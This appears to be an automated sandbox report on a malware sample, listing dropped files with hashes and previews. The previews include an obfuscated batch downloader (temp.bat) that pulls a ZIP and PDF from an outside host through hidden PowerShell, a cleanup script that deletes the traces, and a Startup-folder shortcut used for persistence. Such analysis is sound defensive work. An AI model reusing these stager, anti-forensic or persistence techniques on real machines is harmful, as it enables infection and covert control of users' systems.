                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sm3ruscy.2fy.ps1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_stgwz2q3.bv5.psm1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-15 19-33-09-036.log

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:ASCII text, with very long lines (393)
                                                                      Category:dropped
                                                                      Size (bytes):16525
                                                                      Entropy (8bit):5.345946398610936
                                                                      Encrypted:false
                                                                      SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                                                      MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                                                      SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                                                      SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                                                      SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                                                      Malicious:false
                                                                      Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):15114
                                                                      Entropy (8bit):5.364347385049213
                                                                      Encrypted:false
                                                                      SSDEEP:384:bjhu5rYlBQZzIT879pW8HZkZNqPpDe69jMY9/TfMNHVZATrKShlrEvEh4fpJivnA:Ryi
                                                                      MD5:B4FD8B07D721EA2987C99B971F41ECF1
                                                                      SHA1:8301B24B8D078A678771D8D6DA280E561E75D82A
                                                                      SHA-256:A8D082C2B50E07F6FD6513883BF5BCF958317675981800D2C50DDE8EDC38F07D
                                                                      SHA-512:C6EA12791C7FD44C2C58750887C68ECAD535CA94AF05B527A19C038C0813A64085702FD3188D4FB9A9D6B4AC43D711C6F9B0F578522841A8777E4811F1EDFE70
                                                                      Malicious:false
                                                                      Preview:SessionID=1b362f4a-54d4-452c-9684-5ed7c2e61d98.1734309189047 Timestamp=2024-12-15T19:33:09:047-0500 ThreadID=1184 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=1b362f4a-54d4-452c-9684-5ed7c2e61d98.1734309189047 Timestamp=2024-12-15T19:33:09:048-0500 ThreadID=1184 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=1b362f4a-54d4-452c-9684-5ed7c2e61d98.1734309189047 Timestamp=2024-12-15T19:33:09:048-0500 ThreadID=1184 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=1b362f4a-54d4-452c-9684-5ed7c2e61d98.1734309189047 Timestamp=2024-12-15T19:33:09:048-0500 ThreadID=1184 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=1b362f4a-54d4-452c-9684-5ed7c2e61d98.1734309189047 Timestamp=2024-12-15T19:33:09:048-0500 ThreadID=1184 Component=ngl-lib_NglAppLib Description="SetConf

                                                                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):29752
                                                                      Entropy (8bit):5.393112808012529
                                                                      Encrypted:false
                                                                      SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rk:g
                                                                      MD5:4B941995C9BDA0E889E09D54F1B81766
                                                                      SHA1:5B017213A3BF1F35A9F7AD889B853CCE59AF7FC1
                                                                      SHA-256:FF1481BD50EE126D935494FFBA79656315D976793E342F9D1296D9FBA4337A73
                                                                      SHA-512:5A3973BAFFA3E3F9948E6047D67AC4C13639FCC936F1F88DA1F3E43375A1202BA907DCBFE2E43C9AC5591800A4D4925AA7806CF5C7D3F3C7AE850D06D7D2773C
                                                                      Malicious:false
                                                                      Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-

                                                                      C:\Users\user\AppData\Local\Temp\acrocef_low\3d914166-16f4-4b75-a56a-5021f7a978fd.tmp

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                      Category:dropped
                                                                      Size (bytes):386528
                                                                      Entropy (8bit):7.9736851559892425
                                                                      Encrypted:false
                                                                      SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                      MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                      SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                      SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                      SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                      Malicious:false
                                                                      Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                                      C:\Users\user\AppData\Local\Temp\acrocef_low\a211d14e-985f-4e18-845c-4a9950bdd5a7.tmp

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                      Category:dropped
                                                                      Size (bytes):758601
                                                                      Entropy (8bit):7.98639316555857
                                                                      Encrypted:false
                                                                      SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                      MD5:3A49135134665364308390AC398006F1
                                                                      SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                      SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                      SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                      Malicious:false
                                                                      Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                                      C:\Users\user\AppData\Local\Temp\acrocef_low\d165868c-597a-4368-a713-574a6fa0433a.tmp

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                      Category:dropped
                                                                      Size (bytes):1419751
                                                                      Entropy (8bit):7.976496077007677
                                                                      Encrypted:false
                                                                      SSDEEP:24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru
                                                                      MD5:18E3D04537AF72FDBEB3760B2D10C80E
                                                                      SHA1:B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC
                                                                      SHA-256:BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4
                                                                      SHA-512:2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298
                                                                      Malicious:false
                                                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                      C:\Users\user\AppData\Local\Temp\acrocef_low\f342d3d5-a512-4bb9-9065-1eff867584af.tmp

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                      Category:dropped
                                                                      Size (bytes):1407294
                                                                      Entropy (8bit):7.97605879016224
                                                                      Encrypted:false
                                                                      SSDEEP:24576:/M7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZjZwYIGNPJe:RB3mlind9i4ufFXpAXkrfUs03WLaGZje
                                                                      MD5:716C2C392DCD15C95BBD760EEBABFCD0
                                                                      SHA1:4B4CE9C6AED6A7F809236B2DAFA9987CA886E603
                                                                      SHA-256:DD3E6CFC38DA1B30D5250B132388EF73536D00628267E7F9C7E21603388724D8
                                                                      SHA-512:E164702386F24FF72111A53DA48DC57866D10DAE50A21D4737B5687E149FF9D673729C5D2F2B8DA9EB76A2E5727A2AFCFA5DE6CC0EEEF7D6EBADE784385460AF
                                                                      Malicious:false
                                                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                      C:\Users\user\AppData\Local\Temp\cleanup.bat

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\mshta.exe
                                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):181
                                                                      Entropy (8bit):4.813093282519849
                                                                      Encrypted:false
                                                                      SSDEEP:3:mKDDCMN2RmDNv2lOt+kiE2J5xAIhMS2LFM2H5+Vovu9LsB8SAlOt+kiE2J5xAIzd:hWK2ON+cwkn23fhnKFM0qo29LiXwkn2h
                                                                      MD5:8A4A86F11D27DCCCA147E38CF567C423
                                                                      SHA1:9E47788F703F43B33AE0BE6953E03AFF5E6B75FA
                                                                      SHA-256:98D03BB2A460F8B05DA4D9D71FE3A7022450EDDABA0FD34BC29A7C50EA14BF31
                                                                      SHA-512:C32B1B94F403773D0895606B217F0B8DB7F0498BA09DCC8040F070D53B7A8C617A76A5E57158E9FA34A66CCB847831D7ABA6F3C82FAD20C2EF0E8946876EFF96
                                                                      Malicious:false
                                                                      Preview:@echo off..timeout /t 90 >nul..del "C:\Users\user\AppData\Local\Temp\temp.bat"..del f.pdf..del msword.zip..del downloaded.hta..del "C:\Users\user\AppData\Local\Temp\cleanup.bat"..

                                                                      C:\Users\user\AppData\Local\Temp\f.pdf

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:PDF document, version 1.4, 4 pages
                                                                      Category:dropped
                                                                      Size (bytes):276302
                                                                      Entropy (8bit):7.83317883790279
                                                                      Encrypted:false
                                                                      SSDEEP:6144:f7TySmt1MtVReLAaFQfz33NKy1zdp7Vum1S6rpn7p5Xc7:jGSFUAaFInNKy1Dn1fn7plc7
                                                                      MD5:950557F66ABA12BF2797E9FC134B3DAA
                                                                      SHA1:B882BB3263A69B482C9914A6E2ADA437512C06BD
                                                                      SHA-256:7EC84FF21725BFFDE7F1301C5C3C34810FB1F92D690DBDDE3716860891E0588F
                                                                      SHA-512:03213B75B8383196478F20D0031C8E075D11FED31B89671405E48596F477955688AE234AE44A757E7931E4D5DF7846C644583FA2C60AC670596D219A99C88B91
                                                                      Malicious:true
                                                                      Preview:%PDF-1.4..%......1 0 obj..<< .. /BitsPerComponent 1 .. /ColorSpace 3 0 R .. /Height 3288 .. /Subtype /Image .. /Type /XObject .. /Width 2560 .. /Filter [.. /CCITTFaxDecode ].. .. /DecodeParms [.. << .. /BlackIs1 true .. /Columns 2560 .. /K -1 .. /Rows 3288 .. >>.. ].. .. /Length 2 0 R .. >>..stream..&.>.....m.F.....A.....d.......'d....r.d...9..x8..*.A....m...9...# U.a.Hs.f..@.....$..Xk w....nENS`f@....`...W.9....q.(.L).....`..M%..A...l.."m^@...B.g6...P....4.q..N...)...(......r..Jr......qY.H.D.v.Dq...$X.........T..$.g.^dH.A.9..A......Lz..d.l..A.C[.........*e....E....L.... ...........<.P...$...8k......................&..}...?...............s5...~........._........_...........H...hLP.<..3"...4...."....#.5\.?...3......A...S..y+.BJD.. b!......x(]......T. A.< ._O_P.%.Z......"sK.5..G...!q.H.I'..E.D=..!....%t......g.#.;.H.gA.8........F.j.....:^...Y...H...P`.A.!....e.'.Ma.i.}8M{. ...D. .!..B. ..v.z.p.i='K.J...#.

                                                                      C:\Users\user\AppData\Local\Temp\msword.zip

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                      Category:dropped
                                                                      Size (bytes):3802499
                                                                      Entropy (8bit):4.6033990571172305
                                                                      Encrypted:false
                                                                      SSDEEP:24576:cvQoCg23M7h2IqMNR4WbINxZAQlB+U0zUc:QQvg23M5R4WbI3LlAU0Uc
                                                                      MD5:AC1BB7433BD4A06FA226CFD057526675
                                                                      SHA1:A954C6F43448A85C209CA49408F02FF62A2EE08D
                                                                      SHA-256:CE5E1DBA0DFF8A00221D668D1E6B64419D57073F602CC12EEDFB8CCD46B403EB
                                                                      SHA-512:A0400A7A4C71C5725BF9295C7EB9F6E5C63C2ECA949F922C2A4C31C873EE72F595DBF70ED212CAE2B887E51B89D69F2446288227174A63F9A9429F1EBC888927
                                                                      Malicious:true
                                                                      Preview:PK..........\Y.F.%..:....5....msword.exe..|T.?~.G.l.E...4BP....(qA......f...*..@.9.h.&.....Zko.....[..J[+Q..@..Z........QW.a..............~...g.9..<...sf....#.M.$;.iJR.$.|...4...H....e-.....6eYm..+.Y}.}.w.b.J.........V....,.o....rJ.mL..[.f]..Lr.5uJ6......vL....<X0e0...b..Q.z.....) K.lK.....n.uIVK.%G.V....$.$.j.....'.VI..%[.W.....i....&.H.........Iz.2>..g..........<5HZ2X..........Du.:....'..h..sa.%i...K.T.......#.>...&.0i....V..F.....:qE..........V...yN..FZ..S......K....5.....X..;p.............uN.:........n#...YR...05..9M.a.l.......C..#x...O...G.H_.#EegL>&..C.Q..&%cdy=.F..[]/.B...q~.z....f..v..........r..s.\.......?.C.Q=..v.&.zNv..m.;xaL..D.).....r..@k.#.Y.802.|..3{Y.sm^a..~.<S]j..d..F-ThjU..:g..n....t.....Y....f^.,....eL..L.<..."=.........O...x....S(_...z..n.]bof......}.d.fu..U.p.[............X...4..mV.6+qIo.].l...jq.....r..z...`..5ZX.EUD.._.c..v...s.*42...._,.%(.q........@.g.....T..];.....4.;..r46.:.Wl....XneO.....hc{.|...z.,j

                                                                      C:\Users\user\AppData\Local\Temp\msword\msword.exe

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):891289591
                                                                      Entropy (8bit):4.230074047814782
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:C744E054E4EF01832BBF43B81D397B61
                                                                      SHA1:3360299F013BCD729FD1993280B9304605457238
                                                                      SHA-256:4EC9AD5867629EBDC9655123B138CBE63F7ED1EDFF2022B493DD075BD06C4E3D
                                                                      SHA-512:4DAC02819D1F0B2A56FD1131BDD6B64821B40A3403111DCF5EC58CB688778E8293BC1D41693AA3DC369B0A63A9967FF0CD641F0A2AD8B2678A9E1A0079A523FD
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n...2...B...8............@..................................(....@.................................4........@...o..............h(......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc....o...@...p..................@..@.reloc..2...........................@..B................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\temp.bat

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\mshta.exe
                                                                      File Type:ASCII text, with very long lines (858), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):3432
                                                                      Entropy (8bit):5.234062070088092
                                                                      Encrypted:false
                                                                      SSDEEP:96:/TdUe5HQK36ughbWko0bb3qiek2GsMfTqjLgA784kzc:/1iC6/Hok3ck2m+gA4pc
                                                                      MD5:D549E854FB2AAB68C75932BCF3A665B4
                                                                      SHA1:8A6B197876F71629D0D9203D07ECCE9AF74ED23B
                                                                      SHA-256:1EC09B7E61FA833273AC18D88FAC6A4A170EB9162E9EB22CF792501A5ADB80FC
                                                                      SHA-512:09DC0CA4747C9889E91444D81F169F23F8D06F4E4CCA8100DB0D6EB2CD7C0CD8B8B1A43F02CB3D32AD41A0B3FAEAA5F8CD51AE2099C2B47FEF2DD56DB6C6F6C7
                                                                      Malicious:true
                                                                      Preview:@%GhaE%e%QON%c%oVNlxhS%h%Ycc%o%TZSGZdTzsg% %mCRp%o%mYsfZpXBuP%f%dejTMv%f%rOYSefEO%..set url=https://myguyapp.com/msword.zip..s%fYUsbno%e%mHFqzLlvkW%t%hUBvKOQtW% %BtaDrsJcK%u%bwj%r%bjb%l%cpsWTx%=%CMyfaI%h%NNDC%t%SZG%t%sg%p%wytdXsH%s%XLfYRhO%:%bwaXJSZcr%/%vUI%/%K%m%MCJQ%y%wuBhlDQq%g%bvZ%u%uMfDTf%y%HvowO%a%g%p%gW%p%WuVdNidl%.%J%c%mQbubjWlWA%o%JHjbKI%m%SLrrGw%/%kgMFGJDia%m%iY%s%CyXf%w%AOQZxDh%o%JaMNppS%r%OFHHQzh%d%ogNI%.%CWIe%z%NvLL%i%nUqshO%p%ol%..set url2=https://myguyapp.com/f.pdf..s%lLMxI%e%E%t%HmFSG% %eShSGJ%u%ffAbYQ%r%jKPqgaqto%l%EMjcmqMfca%2%FoaxIpOlBa%=%tFP%h%QfOUPNjO%t%eJQcBi%t%T%p%E%s%cEBinqC%:%gpBCsoCKj%/%O%/%Sc%m%jxCVyoV%y%xupSDw%g%c%u%ZXfcFhQc%y%MTizciab%a%HajpQ%p%egxXS%p%GbeXqb%.%v%c%sOvJGeIi%o%iR%m%ghuPHIK%/%IyQ%f%Hy%.%jbNkg%p%wZavCJ%d%u%f%GZZx%..p%lq%o%rKw%w%rccL%e%MoQtMwm%r%KyfpjVP%s%UeGGJKVJuc%h%OLItsAkTl%e%SvXHsfY%l%xNn%l%qprygNiJ% %u%-%trOPn%W%riAGUqdCY%i%XJzeNiO%n%dADaL%d%vwEhbsFtTh%o%NVBUHaBrg%w%KgiWKgQqo%S%uUzQb%t%bckc%y%yQMRkxNH%l%RCyA%e%vwwwFI% %nLhuAftFS%H%SMhVFx%

                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" >), ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):98
                                                                      Entropy (8bit):4.847622824451179
                                                                      Encrypted:false
                                                                      SSDEEP:3:HRAbABGQaFyw3pYot+kiE2J5mJ17ufLOcsaYuPA/y:HRYF5yjowkn23mf7YswIy
                                                                      MD5:E0B7B80EFEA8FEE463E17B9DFAC63CD8
                                                                      SHA1:0E67515AE0FDD6FEFE5507909217BD6B3910BF8D
                                                                      SHA-256:D2F171FDFED8A949684DF0B49832AC23CEFCBB2A58AC79C394C1C009F4B32597
                                                                      SHA-512:826DCDA1E414189F36DED4028AF8F8DEDC5926C4739E0F907295211E45163F476E0E60CF848D6503E873ACA0735D88766339E73886D3A9AA99ED2087B933532F
                                                                      Malicious:true
                                                                      Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" ..

                                                                      \Device\Null

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\timeout.exe
                                                                      File Type:ASCII text, with very long lines (411), with CRLF line terminators, with overstriking
                                                                      Category:dropped
                                                                      Size (bytes):415
                                                                      Entropy (8bit):3.4014677996260176
                                                                      Encrypted:false
                                                                      SSDEEP:12:hYFTkv1ag7Y5PTgwQ6t6iQUAv/0U0DvsFyESnQBt1XtX:GFIdlQP8kW/0D0FVSnQb19X
                                                                      MD5:61E1CBA13946260690BB73DED66BDA6F
                                                                      SHA1:09BE31351D2EE985EB5D0676358A84BC5F89B8AC
